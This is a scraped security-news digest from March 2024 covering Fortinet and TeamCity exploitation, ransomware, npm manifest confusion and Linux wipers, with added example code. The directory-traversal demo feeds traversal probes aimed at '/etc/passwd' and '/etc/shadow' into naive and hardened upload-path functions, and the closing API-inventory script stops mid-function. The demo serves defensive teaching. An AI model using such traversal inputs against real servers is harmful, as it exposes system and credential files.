          2024-03-21 https://www.bleepingcomputer.com/news/security/exploit-released-for-fortinet-rce-bug-used-in-attacks-patch-now/
          Security researchers have released a proof-of-concept (PoC) exploit for a critical vulnerability in Fortinet's FortiClient Enterprise Management Server (EMS) software, which is now actively exploited in attacks. [...]



          What the Latest Ransomware Attacks Teach About Defending Networks

          exploits ransomware
          2024-03-21 https://www.bleepingcomputer.com/news/security/what-the-latest-ransomware-attacks-teach-about-defending-networks/
          Recent ransomware attacks have shared valuable lessons on how to limit risk to your own networks. Learn from Blink Ops about how organizations can limit their ransomware risk. [...] "

          Autosummary: Ransomware-focused automated workflows can scan files for malware and detonate them in a safe sandbox environment, deploy countermeasures instantly, verify employees have installed important tools like EDR systems on their devices, and perform other tasks much more efficiently than with manual efforts. Blink automated workflow: isolate or unisolate a device on CrowdStrike. Properly encrypt sensitive data: one of the defining shifts in ransomware gangs’ operations over the last few years is becoming more data-focused. What organizations can do to limit ransomware risk: with the onslaught of ransomware attacks companies face and the ever-evolving tactics deployed by hackers, reducing your risks against this nefarious cyber threat calls for multiple layers of defense. Have a solid backup strategy: while encrypting important files prevents ransomware gangs from blackmailing you with the threat of publishing sensitive data, you’ll likely still want access to those files.


          Over 800 npm Packages Found with Discrepancies, 18 Exploitable to "Manifest Confusion"

          exploits
          2024-03-21 https://thehackernews.com/2024/03/over-800-npm-packages-found-with.html
          New research has discovered over 800 packages in the npm registry which have discrepancies from their registry entries, out of which 18 have been found to exploit a technique called manifest confusion. The findings come from cybersecurity firm JFrog, which said the issue could be exploited by threat actors to trick developers into running malicious code. "It's an actual threat since

          Autosummary: "The visible, or 'fake,' manifest can mislead developers and even audit tools that rely on the data available in the npm registry database," JFrog said.
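The check behind the finding above, written out as an added example (this is not JFrog's tool or npm's own code): compare the manifest the registry serves for a version with the package.json inside the tarball for that same version, and flag the fields that change what gets installed or executed. Both documents below are constructed sample data for a hypothetical package "example-widget"; with a real package you would obtain them from `npm view <pkg>@<ver> --json` and from the `package/package.json` entry of the tarball produced by `npm pack <pkg>@<ver>`.

```python
import json

# Constructed sample data for a hypothetical package "example-widget" 1.4.2.
# REGISTRY_MANIFEST is what the registry serves (the document `npm view` and
# most audit tools read); TARBALL_PACKAGE_JSON is the package.json shipped
# inside the tarball, which is what actually governs the install.
REGISTRY_MANIFEST = {
    "name": "example-widget",
    "version": "1.4.2",
    "main": "index.js",
    "dependencies": {"lodash": "^4.17.21"},
    "scripts": {"test": "jest"},
}
TARBALL_PACKAGE_JSON = {
    "name": "example-widget",
    "version": "1.4.2",
    "main": "index.js",
    "dependencies": {"lodash": "^4.17.21", "dropper-helper": "^0.0.1"},
    "scripts": {"test": "jest", "preinstall": "node ./setup.js"},
}

# Fields whose divergence changes what gets installed or executed.
CHECKED_FIELDS = ("name", "version", "main", "dependencies", "scripts")
# Lifecycle scripts npm runs automatically when the package is installed as a dependency.
INSTALL_HOOKS = {"preinstall", "install", "postinstall"}


def canonical(value):
    """Serialize with sorted keys so dict ordering can neither mask nor fake a difference."""
    return json.dumps(value, sort_keys=True, separators=(",", ":"))


def manifest_discrepancies(registry, tarball):
    """Return {field: (registry_value, tarball_value)} for every checked field that differs."""
    findings = {}
    for field in CHECKED_FIELDS:
        reg_val, tar_val = registry.get(field), tarball.get(field)
        if canonical(reg_val) != canonical(tar_val):
            findings[field] = (reg_val, tar_val)
    return findings


def hidden_install_hooks(registry, tarball):
    """Install-time scripts that exist only in the tarball: code that runs on
    `npm install` but is invisible to anyone reading the registry manifest."""
    reg_scripts = set(registry.get("scripts") or {})
    tar_scripts = set(tarball.get("scripts") or {})
    return sorted((tar_scripts - reg_scripts) & INSTALL_HOOKS)


def hidden_dependencies(registry, tarball):
    """Dependencies pulled in by the tarball that the registry manifest does not declare."""
    reg_deps = set(registry.get("dependencies") or {})
    tar_deps = set(tarball.get("dependencies") or {})
    return sorted(tar_deps - reg_deps)


if __name__ == "__main__":
    for field, (reg_val, tar_val) in manifest_discrepancies(REGISTRY_MANIFEST, TARBALL_PACKAGE_JSON).items():
        print(f"{field}: registry={reg_val!r} tarball={tar_val!r}")
    print("hidden install hooks:", hidden_install_hooks(REGISTRY_MANIFEST, TARBALL_PACKAGE_JSON))
    print("hidden dependencies:", hidden_dependencies(REGISTRY_MANIFEST, TARBALL_PACKAGE_JSON))
```

On the sample data the comparison reports that `dependencies` and `scripts` differ, that a `preinstall` hook exists only in the tarball, and that `dropper-helper` is pulled in without being declared in the registry manifest; the name, version and entry point agree, which is exactly why a reviewer reading the registry entry alone would see nothing wrong.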


          KDE advises extreme caution after theme wipes Linux user"s files

          Linux
          2024-03-21 https://www.bleepingcomputer.com/news/linux/kde-advises-extreme-caution-after-theme-wipes-linux-users-files/
          On Wednesday, the KDE team warned Linux users to exercise "extreme caution" when installing global themes, even from the official KDE Store, because these themes run arbitrary code on devices to customize the desktop's appearance. [...]

          Autosummary: Code execution is needed because global themes are designed to change everything on a Plasma desktop, from icons to window decorations, lock screens, splash screens, wallpapers, color schemes, and so on, using executable bash scripts.


          Critical Fortinet’s FortiClient EMS flaw actively exploited in the wild

          exploits
          2024-03-21 https://securityaffairs.com/160885/uncategorized/fortinet-forticlient-ems-critical-flaw.html
          Researchers released a PoC exploit for a critical flaw in Fortinet’s FortiClient Enterprise Management Server (EMS) software, which is actively exploited. Security researchers at Horizon3 have released a proof-of-concept (PoC) exploit for a critical vulnerability, tracked as CVE-2023-48788 (CVSS score 9.3), in Fortinet’s FortiClient Enterprise Management Server (EMS) software. The vulnerability is now actively exploited […] "

          Autosummary: Pierluigi Paganini, March 21, 2024. Researchers released a PoC exploit for a critical flaw in Fortinet’s FortiClient Enterprise Management Server (EMS) software, which is actively exploited.


          API environments becoming hotspots for exploitation

          exploits
          2024-03-20 https://www.helpnetsecurity.com/2024/03/20/apis-risk-exposure-concern/

          A total of 29% of web attacks targeted APIs over 12 months (January through December 2023), indicating that APIs are a focus area for cybercriminals, according to Akamai. API integration amplifies risk exposure for enterprises APIs are at the heart of digital transformation in organizations. However, the existence of APIs heightens the risk exposure of businesses and poses a significant security challenge. Commerce is the most attacked vertical with 44% of API attacks, followed by … More

          The post API environments becoming hotspots for exploitation appeared first on Help Net Security.


          Autosummary: The United States Securities and Exchange Commission (SEC), for example, has recently enacted new rules for public companies that require the disclosure of material security incidents, as well as detailed information about risks, security governance, and oversight. "


          Regulatory measures boost cybersecurity industry

          industry ciber
          2024-03-20 https://www.helpnetsecurity.com/2024/03/20/regulatory-measures-cybersecurity-industry/

          According to the UAE Cybersecurity Council, in 2023, the UAE repelled over 50,000 cyberattacks daily. These findings, highlighted in a report from Frost & Sullivan (F&S), show the exponential growth of the region’s cybersecurity landscape – and serve as a sobering reminder of the rising threats that accompany it. As the GCC (Gulf Cooperation Council) cybersecurity industry continues to grow—F&S estimates it will triple in value by 2030 to reach $13.4 billion—countries in the region … More

          The post Regulatory measures boost cybersecurity industry appeared first on Help Net Security.


          Autosummary: Building a cyber resilient posture Saudi Arabia, the UAE, and Bahrain have also established the National Cybersecurity Authority, the National Electronic Security Authority, and the National Cybersecurity Centre, respectively, to oversee ongoing industry efforts. "


          U.S. EPA Forms Task Force to Protect Water Systems from Cyberattacks

          ciber
          2024-03-20 https://thehackernews.com/2024/03/us-epa-forms-task-force-to-protect.html
          The U.S. Environmental Protection Agency (EPA) said it's forming a new "Water Sector Cybersecurity Task Force" to devise methods to counter the threats faced by the water sector in the country. "In addition to considering the prevalent vulnerabilities of water systems to cyberattacks and the challenges experienced by some systems in adopting best practices, this Task Force in its deliberations



          Tax scammer goes after small business owners and self-employed people

          financial
          2024-03-20 https://www.malwarebytes.com/blog/uncategorized/2024/03/tax-scammer-goes-after-small-business-owners-and-self-employed-people
          We found a tax scammer that set up a fake website where targets could apply for an Employer Identification Number. "

          Autosummary: EINs are used by employers, sole proprietors, corporations, partnerships, non-profit associations, trusts, estates of decedents, government agencies, certain individuals, and other business entities. How to avoid falling for a tax scam: before acting on an email’s request, stop and think about the following: Remember: the IRS doesn’t ask taxpayers for personal or financial information over email, text messages, or social media channels.


          The most prevalent malware behaviors and techniques

          exploits
          2024-03-20 https://www.helpnetsecurity.com/2024/03/20/malware-behaviors-techniques/

          An analysis of 100,000+ Windows malware samples has revealed the most prevalent techniques used by malware developers to successfully evade defenses, escalate privileges, execute the malware, and assure its persistence. Malware tactics and techniques: the analyzed malware samples were most often delivered via malicious email attachments featuring macro-enabled documents, Windows shortcut files (LNK), ISO/VHD containers, and MSI installers. It should come as no surprise that defense evasion is by far the most common tactic … More

          The post The most prevalent malware behaviors and techniques appeared first on Help Net Security.




          TeamCity Flaw Leads to Surge in Ransomware, Cryptomining, and RAT Attacks

          exploits government ransomware
          2024-03-20 https://thehackernews.com/2024/03/teamcity-flaw-leads-to-surge-in.html
          Multiple threat actors are exploiting the recently disclosed security flaws in JetBrains TeamCity software to deploy ransomware, cryptocurrency miners, Cobalt Strike beacons, and a Golang-based remote access trojan called Spark RAT. The attacks entail the exploitation of CVE-2024-27198 (CVSS score: 9.8) that enables an adversary to bypass authentication measures and gain administrative "

          Autosummary: According to statistics published by NCC Group, the total number of ransomware cases in February 2024 increased by 46% from January, up from 285 to 416, led by LockBit (33%), Hunters (10%), BlackCat (9%), Qilin (9%), BianLian (8%), Play (7%), and 8Base (7%).


          New BunnyLoader Malware Variant Surfaces with Modular Attack Features

          exploits
          2024-03-20 https://thehackernews.com/2024/03/new-bunnyloader-malware-variant.html
          Cybersecurity researchers have discovered an updated variant of a stealer and malware loader called BunnyLoader that modularizes its various functions and allows it to evade detection. "BunnyLoader is dynamically developing malware with the capability to steal information, credentials and cryptocurrency, as well as deliver additional malware to its victims," Palo Alto Networks

          Autosummary: The new version, dubbed BunnyLoader 3.0, was announced by its developer named Player (or Player_Bunny) on February 11, 2024, with rewritten modules for data theft, reduced payload size, and enhanced keylogging capabilities. "


          Fraud risk for Vans customers after data breach

          financial
          2024-03-20 https://www.bbc.co.uk/news/technology-68615042
          The footwear firm's parent company was hacked and customers' personal information stolen.



          Ivanti fixes critical Standalone Sentry bug reported by NATO

          exploits
          2024-03-20 https://www.bleepingcomputer.com/news/security/ivanti-fixes-critical-standalone-sentry-bug-reported-by-nato/
          Ivanti warned customers to immediately patch a critical severity Standalone Sentry vulnerability reported by NATO Cyber Security Centre researchers. [...] "



          Fraudsters are posing as the FTC to scam consumers

          financial
          2024-03-20 https://www.tripwire.com/state-of-security/fraudsters-are-posing-ftc-scam-consumers
          The United States Federal Trade Commission (FTC) has warned the public to be cautious if contacted by people claiming to be... FTC staff. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: The FTC's advice is clear: it never tells consumers to move their money to "protect" it. The FTC will never send consumers to a Bitcoin ATM, tell them to go buy gold bars, or demand they withdraw cash and take it to someone in person.


          Threat actors actively exploit JetBrains TeamCity flaws to deliver malware

          exploits government
          2024-03-20 https://securityaffairs.com/160823/breaking-news/jetbrains-teamcity-flaws-actively-exploited.html
          Multiple threat actors are exploiting the recently disclosed JetBrains TeamCity flaw CVE-2024-27198 in attacks in the wild. Trend Micro researchers report that attackers are exploiting the recently disclosed vulnerabilities CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3) in JetBrains TeamCity to deploy multiple malware families and gain administrative control over impacted systems. In early March, Rapid7 […]

          Autosummary: Trend Micro reported that threat actors can exploit CVE-2024-27198 to perform a broad range of malicious activities, including: dropping the Jasmin ransomware; deploying the XMRig cryptocurrency miner; deploying Cobalt Strike beacons; deploying the SparkRAT backdoor; and executing domain discovery and persistence commands. “Threat actors might exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication on vulnerable On-Premise TeamCity servers and perform follow-on commands.” Trend Micro researchers observed attackers exploiting the recently disclosed vulnerabilities CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3) in JetBrains TeamCity to deploy multiple malware families and gain administrative control over impacted systems.


          Spa Grand Prix email account hacked to phish banking info from fans

          financial
          2024-03-20 https://www.bleepingcomputer.com/news/security/spa-grand-prix-email-account-hacked-to-phish-banking-info-from-fans/
          Hackers hijacked the official contact email for the Belgian Grand Prix event and used it to lure fans to a fake website promising a €50 gift voucher. [...] "

          Autosummary: In a press release sent to BleepingComputer, the race organizer explains that the email account was hijacked on Sunday, March 17, 2024 and was followed by the threat actor sending fraudulent emails to an undisclosed number of people. "


          Ivanti fixes RCE vulnerability reported by NATO cybersecurity researchers (CVE-2023-41724)

          exploits ciber
          2024-03-20 https://www.helpnetsecurity.com/2024/03/20/cve-2023-41724-cve-2023-46808/

          Ivanti has fixed a critical RCE vulnerability (CVE-2023-41724) in Ivanti Standalone Sentry that has been reported by researchers with the NATO Cyber Security Centre. Though the company is not aware of customers being compromised via the flaw, it “strongly encourages” them to implement the patch immediately. About CVE-2023-41724 Ivanti Standalone Sentry is an appliance that acts as a gateway between devices and an organization’s ActiveSync-enabled email servers (e.g., Microsoft Exchange Server) or backend resource (e.g., … More

          The post Ivanti fixes RCE vulnerability reported by NATO cybersecurity researchers (CVE-2023-41724) appeared first on Help Net Security.


          Autosummary: About CVE-2023-41724 Ivanti Standalone Sentry is an appliance that acts as a gateway between devices and an organization’s ActiveSync-enabled email servers (e.g., Microsoft Exchange Server) or backend resource (e.g., Microsoft Sharepoint server). "


          Ex-Brazil star Robinho told to serve nine-year rape sentence

          latam
          2024-03-20 https://www.bbc.co.uk/sport/football/68621947
          Former Manchester City and Real Madrid forward Robinho must serve a nine-year rape sentence in his home country of Brazil, a court rules. "



          Cybersecurity jobs available right now: March 19, 2024

          ciber
          2024-03-19 https://www.helpnetsecurity.com/2024/03/19/cybersecurity-jobs-available-right-now-march-19-2024/

          Central Investigations & Cybersecurity Analyst Meta | USA | On-site – View job details The successful candidate will be able to assess and analyze large amounts of data to identify sources of potential threats and abuses, operate independently in a fast-paced environment, and collaborate with teams across the company. In addition to having a strong investigative and analytical background, Meta is seeking an investigator with experience making risk-based decisions and who is passionate about protecting … More

          The post Cybersecurity jobs available right now: March 19, 2024 appeared first on Help Net Security.


          Autosummary: Director of Cybersecurity Endeavor | USA | On-site – View job details This hands-on, director-level role requires a blend of technical expertise, leadership abilities, and an understanding of cybersecurity governance, documentation, and training. Senior DevSecOps and IT Manager TestGorilla | EU | Remote – View job details TestGorilla are looking for a Senior Engineer Manager to lead their small DevSecOps and IT team of experienced engineers, responsible for developing, designing, and maintaining cloud infrastructure, DevOps tools and guidelines, and security and IT measures. "


          Outsmarting cybercriminal innovation with strategies for enterprise resilience

          ciber
          2024-03-19 https://www.helpnetsecurity.com/2024/03/19/pedro-cameirao-nokia-emerging-cybersecurity-trends/

          In this Help Net Security interview, Pedro Cameirão, Head of Cyber Defense Center at Nokia, discusses emerging cybersecurity trends for 2024 and advises enterprises on preparation strategies. Cameirão will speak at GISEC Global 2024 in Dubai, a conference and exhibition bringing together some of the brightest minds in cybersecurity. What emerging cybersecurity trends should enterprises be aware of in 2024, and how should they prepare for these new threats? We observe that threat actors are … More

          The post Outsmarting cybercriminal innovation with strategies for enterprise resilience appeared first on Help Net Security.


          Autosummary: The rise of advanced persistent threats (APTs), phishing-as-a-service, ransomware-as-a-service models, and nation-state-sponsored cyber-attacks further compounds the complexity of the threat landscape. These may include thorough vetting processes for employees with sensitive roles, systematically implementing least-privilege access, introducing privileged management systems, network segregation, data loss prevention (DLP), and security monitoring, among others. To reduce the risk from supply-chain attacks, enterprises must implement supplier and third-party evaluation programs assessing their compliance with cybersecurity best practices, regulations, and industry standards.


          New Phishing Attack Uses Clever Microsoft Office Trick to Deploy NetSupport RAT

          financial
          2024-03-19 https://thehackernews.com/2024/03/new-phishing-attack-uses-clever.html
          A new phishing campaign is targeting U.S. organizations with the intent to deploy a remote access trojan called NetSupport RAT. Israeli cybersecurity company Perception Point is tracking the activity under the moniker Operation PhantomBlu. "The PhantomBlu operation introduces a nuanced exploitation method, diverging from NetSupport RAT’s typical delivery mechanism by leveraging OLE (Object "

          Autosummary: Growing abuse of cloud platforms and popular CDNs: the development comes as Resecurity revealed that threat actors are increasingly abusing public cloud services like Dropbox, GitHub, IBM Cloud, and Oracle Cloud Storage, as well as Web 3.0 data-hosting platforms built on the InterPlanetary File System (IPFS) protocol such as Pinata to generate fully undetectable (FUD) phishing URLs using phishing kits.


          Earth Krahang APT breached tens of government organizations worldwide

          government
          2024-03-19 https://securityaffairs.com/160702/apt/earth-krahang-apt.html
          Trend Micro uncovered a sophisticated campaign conducted by Earth Krahang APT group that breached 70 organizations worldwide. Trend Micro researchers uncovered a sophisticated campaign conducted by a threat actor tracked as Earth Krahang while investigating the activity of China-linked APT Earth Lusca.  The campaign seems active since at least early 2022 and focuses primarily on […] "

          Autosummary: Earth Krahang was observed exploiting the following vulnerabilities to deploy webshells on target servers and gain a foothold within victim networks: CVE-2023-32315 (command execution on OpenFire) and CVE-2022-21587 (command execution on Oracle Web Applications Desktop Integrator). The spear-phishing messages used by the attackers are designed to deceive victims into opening attachments or clicking on embedded URL links, which ultimately results in the deployment of a backdoor on the victim’s machine. The threat actors used this infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets, leveraging compromised government email accounts.


          SUSE announces new enhancements to help users manage business-critical workloads

          Linux
          2024-03-19 https://www.helpnetsecurity.com/2024/03/19/suse-rancher-prime-3-0/

          SUSE announced enhancements across its cloud native and Edge portfolio to enable customers to securely deploy and manage business-critical workloads anywhere. New capabilities in Rancher Prime 3.0, SUSE’s commercial offering of Rancher and SUSE Edge 3.0 commit to enabling choice and providing secure platforms through 100 percent open source solutions. “At SUSE, our commercial and open source users are equally important,” said Peter Smails, GM of the SUSE Enterprise Container Management business unit. “As such, … More

          The post SUSE announces new enhancements to help users manage business-critical workloads appeared first on Help Net Security.


          Autosummary: SUSE is also introducing Rancher Enterprise, a single package and price for the entire portfolio of Rancher Prime including multi-cluster management, OS management, VM management, persistent storage, and SUSE’s certified Linux OS, SUSE Linux Enterprise Micro. Security and lifecycle management, enabling self-service PaaS with Rancher Prime New capabilities in Rancher Prime 3.0 help platform engineering teams deliver self-service Platform-as-a-Service (PaaS) to their developer communities, and enhanced support for AI workloads. "


          PoC exploit for critical Fortra FileCatalyst MFT vulnerability released (CVE-2024-25153)

          exploits
          2024-03-19 https://www.helpnetsecurity.com/2024/03/19/cve-2024-25153-poc-exploit/

          Proof-of-concept (PoC) exploit code for a critical RCE vulnerability (CVE-2024-25153) in Fortra FileCatalyst MFT solution has been published. About CVE-2024-25153 Fortra FileCatalyst is an enterprise managed file transfer (MFT) software solution that includes several components: FileCatalyst Direct, Workflow, and Central. CVE-2024-25153 is a directory traversal vulnerability in FileCatalyst Workflow’s web portal that could allow a remote authenticated threat actor to execute arbitrary code on vulnerable servers. “A directory traversal within the ‘ftpservlet’ of the FileCatalyst … More

          The post PoC exploit for critical Fortra FileCatalyst MFT vulnerability released (CVE-2024-25153) appeared first on Help Net Security.


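Directory traversal in a file-upload endpoint, as an added illustration of the bug class named in the entry above. This is generic example code, not FileCatalyst's code, and it does not reproduce the actual flaw in the 'ftpservlet': it places the naive pattern (a client-supplied filename joined straight onto the upload directory) beside a hardened version that decodes first, keeps only the last path component, rejects dot names, and re-checks containment. The upload root is a hypothetical path chosen for the example and the traversal inputs are constructed; everything is lexical, so nothing touches the filesystem.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical upload directory for the example.
UPLOAD_ROOT = "/var/app/uploads"


def naive_upload_path(root, user_name):
    """Vulnerable pattern: the client-controlled name is joined straight onto
    the upload root, so '../' segments walk out of it."""
    return posixpath.normpath(posixpath.join(root, user_name))


def escapes_root(root, path):
    """True if the normalized path lies outside the root. Using commonpath (not a
    string prefix) also catches sibling directories such as /var/app/uploads2."""
    root = posixpath.normpath(root)
    return posixpath.commonpath([root, posixpath.normpath(path)]) != root


def safe_upload_path(root, user_name):
    """Hardened version. Percent-decoding happens before the checks, never
    after, so '..%2F' cannot slip past them; backslashes are treated as
    separators; only the final component is kept; dot names are rejected;
    containment is verified anyway as defence in depth."""
    decoded = unquote(user_name).replace("\\", "/")
    name = posixpath.basename(decoded)
    if name in ("", ".", ".."):
        raise ValueError(f"rejected filename: {user_name!r}")
    candidate = posixpath.normpath(posixpath.join(root, name))
    if escapes_root(root, candidate):
        raise ValueError(f"path escapes upload root: {user_name!r}")
    return candidate


def is_rejected(root, user_name):
    """Does the hardened function refuse this name?"""
    try:
        safe_upload_path(root, user_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed probes: a benign name, plain traversal, percent-encoded
    # traversal, a bare dot-dot, and Windows-style separators.
    for probe in ("report.pdf", "../../etc/passwd", "..%2F..%2Fetc%2Fshadow", "..", "dir\\..\\..\\x.txt"):
        naive = naive_upload_path(UPLOAD_ROOT, probe)
        hardened = "rejected" if is_rejected(UPLOAD_ROOT, probe) else safe_upload_path(UPLOAD_ROOT, probe)
        print(f"{probe!r:28} naive={naive!r:36} escapes={escapes_root(UPLOAD_ROOT, naive)!s:5} safe={hardened}")
```

Note what the naive function shows for the percent-encoded probe: it does not escape, because the naive code never decodes. In a real servlet the container decodes the request path before the handler sees it, which is why the hardened version decodes explicitly and then checks, rather than checking the raw string.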


          Crafting and Communicating Your Cybersecurity Strategy for Board Buy-In

          ciber
          2024-03-19 https://thehackernews.com/2024/03/crafting-and-communicating-your.html
          In an era where digital transformation drives business across sectors, cybersecurity has transcended its traditional operational role to become a cornerstone of corporate strategy and risk management. This evolution demands a shift in how cybersecurity leaders—particularly Chief Information Security Officers (CISOs)—articulate the value and urgency of cybersecurity investments to their boards.

          Autosummary: "How does our cybersecurity spending compare to our competitors?" Instead, encouraging the board to ask strategic questions like, "What resources do we need to feel comfortable with our level of risk?" transforms the dialogue. For example, among major US corporations, 51% of Fortune 100 companies have at least one director with a background in information security, while this figure drops to only 17% for S&P 500 companies and further declines to just 9% for companies listed in the Russell 3000 Index, highlighting a significant variation in cybersecurity expertise at the board level across different sizes of businesses. Speak the language of the board: perform a Business Impact Analysis and translate technical cybersecurity risks into business terms that resonate with the board, such as financial impact, regulatory compliance, and reputational damage. The surge in cyber threats, coupled with their capacity to disrupt business operations, erode customer trust, and incur significant financial losses, underscores the strategic value of robust cybersecurity measures. For C-suite executives and board members, staying ahead of these regulations and integrating their requirements into your company's cybersecurity strategy is now an indispensable part of the job, emphasizing the need for a strategic, informed approach to cybersecurity governance.


          Hackers Exploiting Popular Document Publishing Sites for Phishing Attacks

          financial exploits
          2024-03-19 https://thehackernews.com/2024/03/hackers-exploiting-popular-document.html
          Threat actors are leveraging digital document publishing (DDP) sites hosted on platforms like FlipSnack, Issuu, Marq, Publuu, RelayTo, and Simplebooklet for carrying out phishing, credential harvesting, and session token theft, once again underscoring how threat actors are repurposing legitimate services for malicious ends. "Hosting phishing lures on DDP sites increases the likelihood "

          Autosummary: "


          Suspected Russian Data-Wiping "AcidPour" Malware Targeting Linux x86 Devices

          exploits rusia-ucrania Linux
          2024-03-19 https://thehackernews.com/2024/03/suspected-russian-data-wiping-acidpour.html
          A new variant of a data wiping malware called AcidRain has been detected in the wild that's specifically designed for targeting Linux x86 devices. The malware, dubbed AcidPour, is compiled for Linux x86 devices, SentinelOne's Juan Andres Guerrero-Saade said in a series of posts on X. "The new variant [...] is an ELF binary compiled for x86 (not MIPS) and while it refers to similar devices/

          Autosummary: "


          Threat landscape for industrial automation systems. Statistics for H2 2023

          industry
          2024-03-19 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2023/
          The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

          Autosummary: 2023 in numbers (percentage of ICS computers on which the given threats were blocked):

          Parameter                                              H1 2023   H2 2023   2023
          Global percentage of attacked ICS computers            34.0%     31.9%     38.6%
          Main threat sources
            Internet                                             19.3%     18.1%     22.8%
            Email clients                                        6.0%      4.0%      5.4%
            Removable media                                      3.4%      1.9%      3.2%
            Network folders                                      0.49%     0.25%     0.45%
          Malicious objects from different categories
            Malicious scripts and phishing pages (JS and HTML)   12.7%     10.9%     14.7%
            Denylisted internet resources                        11.3%     10.1%     13.7%
            Spy Trojans, backdoors and keyloggers                6.1%      5.3%      7.1%
            Malicious documents (Microsoft Office and PDF)       4.0%      2.9%      4.0%
            Worms                                                2.3%      2.1%      3.0%
            Viruses                                              2.4%      2.1%      2.8%
            Web miners running in browsers                       1.3%      0.76%     1.3%
            Miners in the form of executable files for Windows   0.59%     0.85%     1.1%
            Ransomware                                           0.32%     0.25%     0.37%

          Back to the minimum: following the increase of 2021 and 2022, the percentage of ICS computers on which malicious objects were blocked dropped by 2 pp and returned to the same level as in 2020. In terms of month-to-month fluctuations, 2023 differs from the two years that preceded it, while being closer to 2021 than to 2022.

          Scope: the statistics cover Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; data storage (Historian) servers; data gateways (OPC); stationary and mobile workstations of engineers and operators; human machine interface (HMI); OT network administration computers; ICS software development computers. A computer is considered attacked if a Kaspersky security solution blocked one or more threats on it during the period in review (a month, six months, or a year, depending on the context).

          Red lines of 2023: by the end of 2023, the percentage of ICS computers on which malicious objects were blocked increased in two regions: Eastern Europe (by 4.4 pp) and Western Europe (by 3.5 pp). In Eastern Europe, H1 2023 saw the lowest figures since 2020 and H2 the highest percentage of attacked ICS computers in 2020-2023 (30.9%). In Western Europe, the percentage of attacked ICS computers in every month of 2023 except January represented a year-on-year increase. As with the statistics across all threats, the percentage of ICS computers on which malicious objects from various sources were blocked varied with region.

          By threat category, H2 2023: Africa led the regional rankings for spyware, worms, web miners and removable media threats. The percentage of ICS computers on which malicious scripts and phishing pages were blocked increased in six regions within the six-month period, most of all in Eastern Europe (by 2.9 pp). The percentage on which ransomware was blocked dropped to the four-year minimum of 0.25%. Tajikistan (18.2%) and Yemen (16.6%) led the country ranking for denylisted internet resources; Greece (9.4%) and Mexico (8.5%) for malicious documents; Yemen (3.9%) and Serbia (3.5%) for browser-based web miners. Among the industries studied, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked.


          New AcidPour data wiper targets Linux x86 network devices

          Linux
          2024-03-19 https://www.bleepingcomputer.com/news/security/new-acidpour-data-wiper-targets-linux-x86-network-devices/
          A new destructive malware named AcidPour was spotted in the wild, featuring data-wiper functionality and targeting Linux x86 IoT and networking devices. [...] "

          Autosummary: Code comparison showing functional similarities (@juanandres_gs) AcidPour shares input/output control (IOCTL)-based wiping logic with VPNFilter's "dstr" plugin and AcidRain, indicating a continuation or adaptation of the previously documented malicious techniques. "


          CalypsoAI Platform provides real-time LLM cybersecurity insights

          ciber
          2024-03-19 https://www.helpnetsecurity.com/2024/03/19/calypsoai-platform-provides-real-time-llm-cybersecurity-insights/

          CalypsoAI has launched the CalypsoAI Platform, a SaaS-based security and enablement solution for generative AI applications within the enterprise. With the new model-agnostic SaaS platform, technology, innovation, and security leaders can harness the power of generative AI and large language models (LLMs) across their enterprise safely and securely. According to a recent Boston Consulting Group survey of more than 1,400 C-suite executives, 90% of leaders are still waiting for generative AI to move beyond the … More

          The post CalypsoAI Platform provides real-time LLM cybersecurity insights appeared first on Help Net Security.

          "

          Autosummary: In addition, the Platform offers: Security and observability across all LLM usage : With new observability and visibility dashboards, users get a first-of-its-kind solution to scan, flag, alert, and protect systems against common vulnerabilities and internal and external risks in real time. : With new observability and visibility dashboards, users get a first-of-its-kind solution to scan, flag, alert, and protect systems against common vulnerabilities and internal and external risks in real time. "


          APIs Drive the Majority of Internet Traffic and Cybercriminals are Taking Advantage

          ciber
          2024-03-19 https://thehackernews.com/2024/03/apis-drive-majority-of-internet-traffic.html
          Application programming interfaces (APIs) are the connective tissue behind digital modernization, helping applications and databases exchange data more effectively. The State of API Security in 2024 Report from Imperva, a Thales company, found that the majority of internet traffic (71%) in 2023 was API calls. What’s more, a typical enterprise site saw an average of 1.5 billion API "

          Autosummary: How to Protect Your APIs Imperva offers several recommendations to help organizations improve their API Security posture: Discover, classify, and inventory all APIs, endpoints, parameters, and payloads.When successful, these attacks can lock customers out of their accounts, provide criminals with sensitive data, contribute to revenue loss, and increase the risk of non-compliance. In their report, Imperva identified three common types of mismanaged API endpoints that create security risks for organizations: shadow, deprecated, and unauthenticated APIs. "
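          The three mismanaged endpoint classes named above (shadow, deprecated and unauthenticated APIs) can be found mechanically by reconciling what the gateway actually sees against what the API specification declares. The following is an added example, not Imperva's code or tooling: the OpenAPI-style spec and the access-log lines are constructed here, the service paths are hypothetical, and the classification rules (an undocumented path or method is shadow; a documented-deprecated operation that still receives traffic is deprecated-in-use; an operation whose effective security list is empty is unauthenticated) are this example's own.

```python
from typing import Dict, List, Optional

# Constructed OpenAPI-style description of a hypothetical service (not a real API).
SPEC = {
    "security": [{"bearerAuth": []}],            # default: every operation needs a token
    "paths": {
        "/api/v2/users/{id}": {"get": {"security": [{"bearerAuth": []}]}},
        "/api/v1/users/{id}": {"get": {"deprecated": True}},   # inherits the default
        "/api/v2/status":     {"get": {"security": []}},       # deliberately public
        "/api/v2/export":     {"post": {"security": []}},      # public *and* writes: review
    },
}

# Constructed access-log lines ("METHOD PATH STATUS"), as a gateway would emit them.
ACCESS_LOG = """\
GET /api/v2/users/42 200
GET /api/v1/users/42 200
GET /api/v2/status 200
POST /api/v2/export 200
GET /internal/debug/config 200
DELETE /api/v2/users/42 403
"""


def matches(template: str, path: str) -> bool:
    """Match a concrete path against an OpenAPI template; {param} matches one segment."""
    t, p = template.strip("/").split("/"), path.strip("/").split("/")
    return len(t) == len(p) and all(a.startswith("{") or a == b for a, b in zip(t, p))


def requires_auth(spec: Dict, op: Dict) -> bool:
    """An operation's own security list overrides the global one; an empty list means open."""
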